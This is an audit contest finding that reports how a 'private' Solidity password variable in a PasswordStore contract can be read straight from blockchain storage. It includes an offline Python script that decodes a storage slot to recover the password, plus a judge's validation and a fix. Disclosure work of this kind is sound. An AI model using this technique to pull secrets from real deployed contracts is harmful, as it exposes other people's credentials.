Contest tags: Beginner Friendly, Foundry
Submission Details
Severity: high
Valid

Insecure Password Storage

Summary

The private state variable string private s_password suffers from a fundamental weakness: data held in a smart contract's storage can be read by anyone, regardless of the Solidity visibility modifier applied to it.

Vulnerability Details

The core vulnerability in this contract stems from the transparency of blockchain data: every value written to a contract's storage is visible to anyone who can query a node.

The private keyword in Solidity restricts access only at the language level. It stops other contracts (including derived contracts) from reading the variable through Solidity and suppresses the automatic getter. It does not change what is written to chain storage, and it does not prevent external parties from reading that storage directly.

As a result, even though s_password is marked private, anyone can read it with a raw storage query such as eth_getStorageAt (or a tool built on it) without calling any function of the contract. The plaintext is also visible in the calldata of the transaction that set it.
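As an added example that is not part of the original submission or of the PasswordStore code, the script below shows how a storage reader recovers a "private" string. It assumes s_password is the second declared state variable (storage slot 1, an assumption, since the report does not give the layout) and uses a constructed slot dump in place of a live eth_getStorageAt or cast storage response; the helper names are mine.

```python
"""Read a Solidity `string` straight out of contract storage.

Added example for this report, not code from the PasswordStore project.
The slot value normally comes from an RPC call such as eth_getStorageAt
(for example `cast storage <address> <slot>`); here a constructed slot
dump is embedded so the script runs offline.
"""
from __future__ import annotations

SLOT_BYTES = 32


def encode_short_string_slot(text: str) -> str:
    """Encode a string of at most 31 bytes the way Solidity lays it out.

    Layout for short `string`/`bytes`: data left-aligned in the high-order
    bytes, lowest byte = 2 * length (lowest bit clear).
    """
    data = text.encode("utf-8")
    if len(data) > 31:
        raise ValueError("short-string layout only covers up to 31 bytes")
    slot = data.ljust(SLOT_BYTES - 1, b"\x00") + bytes([2 * len(data)])
    return "0x" + slot.hex()


def decode_string_slot(slot_hex: str) -> tuple[str, object]:
    """Decode one 32-byte slot holding a Solidity `string`.

    Returns ("short", text) when the value is stored inline. For strings of
    32 bytes or more the slot holds 2 * length + 1 (lowest bit set) and the
    data lives at keccak256(slot) onwards; that case returns ("long", length)
    so the caller knows how many further slots to fetch.
    """
    raw = bytes.fromhex(slot_hex.removeprefix("0x").rjust(2 * SLOT_BYTES, "0"))
    if len(raw) != SLOT_BYTES:
        raise ValueError("a storage slot is exactly 32 bytes")
    marker = int.from_bytes(raw, "big")
    if marker & 1:
        return ("long", (marker - 1) // 2)
    length = raw[-1] // 2
    if length > 31:
        raise ValueError("inconsistent short-string marker")
    return ("short", raw[:length].decode("utf-8"))


# Constructed storage dump, shaped like eth_getStorageAt output for a contract
# whose first state variable is an address (slot 0) and whose second is the
# private string (slot 1). The address is a placeholder, not a real account.
CONSTRUCTED_STORAGE = {
    0: "0x000000000000000000000000" + "11" * 20,
    1: encode_short_string_slot("myPassword"),
}

# Assumed slot for s_password: 1, i.e. it is the second declared variable.
PASSWORD_SLOT = 1


def recover_password(storage: dict[int, str], slot: int = PASSWORD_SLOT) -> str:
    """Recover the 'private' password from a storage dump without calling the contract."""
    kind, value = decode_string_slot(storage[slot])
    if kind != "short":
        raise NotImplementedError(f"long string of {value} bytes starts at keccak256({slot})")
    return value


if __name__ == "__main__":
    print("slot 1 raw:", CONSTRUCTED_STORAGE[PASSWORD_SLOT])
    print("password  :", recover_password(CONSTRUCTED_STORAGE))
```

Against a live deployment the only change is replacing CONSTRUCTED_STORAGE with the hex returned by the node for the contract address and slot; no transaction is sent and no contract function is called, which is exactly why the private modifier offers no protection.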

Impact

The password stored in string private s_password can be read by anyone. The variable provides no confidentiality, so any access control placed on functions that return it is ineffective against a party who reads storage directly.

Tools Used

Manual Review

Recommendations

To address the vulnerability, do not rely on private for confidentiality. If the password must be stored on chain at all, encrypt it off chain before it is stored, with a key that is never written to the blockchain and never passed as a function argument, so that the stored ciphertext remains unreadable even though it is public. Encrypting inside the contract does not help, because the plaintext and any key would be visible in the transaction's calldata. Note that this approach moves the secret to the encryption key, which the owner must then manage off chain.

Updates

Lead Judging Commences

inallhonesty Lead Judge
over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible to the contract they are defined in, not to derived contracts. In this case private doesn't mean secret/confidential.
